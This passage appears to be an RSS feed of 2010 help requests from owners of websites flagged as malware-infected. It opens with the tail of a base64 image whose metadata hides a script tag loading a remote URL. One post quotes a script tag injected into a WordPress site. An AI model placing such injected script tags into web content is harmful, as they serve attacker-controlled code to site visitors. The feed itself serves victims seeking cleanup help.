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 xpIAAAAASUVORK5CYII= ' alt='' /></p> contact@badwarebusters.org (megamikno) Wed, 01 Sep 2010 13:53:22 -0400 http://badwarebusters.org/main/itemview/21130 http://badwarebusters.org/main/itemview/21130 <p>help! my site has been listed as malware infected. can you please help me?</p> contact@badwarebusters.org (eveb) Wed, 01 Sep 2010 11:54:42 -0400 http://badwarebusters.org/main/itemview/21124 http://badwarebusters.org/main/itemview/21124 <p>Our site alfafit.cz was mared as malware containing web last week. Problem was solved on 08/26/2010 by removing bad content. Than dissapeard &#8220;malware&#8221; warning from &#8220;tools for webmasters&#8221;. Problem is that anti-virus software ClamAV run by webhosting provider is still blocking incoming and outcoming mails from our mailboxes. On ClamAV pages is written, that it uses Google safebrowsing database. Where should I write to update this databse and remove this wrong record? Thanks for help.</p> contact@badwarebusters.org (lukas10) Wed, 01 Sep 2010 09:22:10 -0400 http://badwarebusters.org/main/itemview/21120 http://badwarebusters.org/main/itemview/21120 <p>Hey</p> <p>REcently my site has been infected with a virus or something. It is a wordpress site.</p> <p>http://menhealthsecrets.com/</p> <p>I checked on google webmaster tools and this is the code</p> &lt;script src=http://spinalhealthcare.org/_private/duringsurge<br /> ry2.php &gt;<br /> <br /> where can i find it and remove it from my site?<br /> <br /> I would appreciate any help. contact@badwarebusters.org (donp) Wed, 01 Sep 2010 08:53:53 -0400 http://badwarebusters.org/main/itemview/21116 http://badwarebusters.org/main/itemview/21116 <p>Please help us to disable &#8220;attack site&#8221; warnings in Firefox our website www.megatest.ru.<br /> We cleaned virusees at our web page already.</p> contact@badwarebusters.org (megatest) Wed, 01 Sep 2010 07:22:33 -0400 http://badwarebusters.org/main/itemview/21115 http://badwarebusters.org/main/itemview/21115 <p>Google has flagged my site as possibly harmful but I can&#8217;t find any bad code. I&#8217;m not an expert geek yet. I would be much obliged if someone could check my pages and see what they might be talking about. My site is prevailingwordministries.com</p> contact@badwarebusters.org (Larrya) Wed, 01 Sep 2010 06:01:41 -0400 http://badwarebusters.org/main/itemview/21112 http://badwarebusters.org/main/itemview/21112 <p>My site is showing message harmful website<br /> Kindly advise how to fix this</p> <p>www.oberoihospital.com</p> contact@badwarebusters.org (mrinalwebdesigner) Wed, 01 Sep 2010 05:03:44 -0400 http://badwarebusters.org/main/itemview/21111 http://badwarebusters.org/main/itemview/21111 <p>My site is http://www.3d-dsign.com infect malware according to google safe browsing<br /> http://www.google.com/safebrowsing/diagnostic?site=http://3d-dsign.com/<br /> I search and remove malware code from my site and request review from google <br /> but google safe browsing still show &#8220;this site has hosted malicious software&#8221;</p> <p>Please help me</p> <p>Thank you</p> contact@badwarebusters.org (notokung) Wed, 01 Sep 2010 03:27:03 -0400 http://badwarebusters.org/main/itemview/21110 http://badwarebusters.org/main/itemview/21110 <p>i can&#8217;t find any malware in my website &#8220;ecobag.com.mx&#8221; .. please help me.. i&#8217;m a newbie in this stuff</p> contact@badwarebusters.org (adyx1on) Tue, 31 Aug 2010 21:09:23 -0400 http://badwarebusters.org/main/itemview/21101 http://badwarebusters.org/main/itemview/21101 <p>Hi,</p> <p>Can you help me and point out what is wrong on my site please.</p> <p>Thanks<br /> James</p> contact@badwarebusters.org (Jamesd) Tue, 31 Aug 2010 16:17:10 -0400 http://badwarebusters.org/main/itemview/21099 http://badwarebusters.org/main/itemview/21099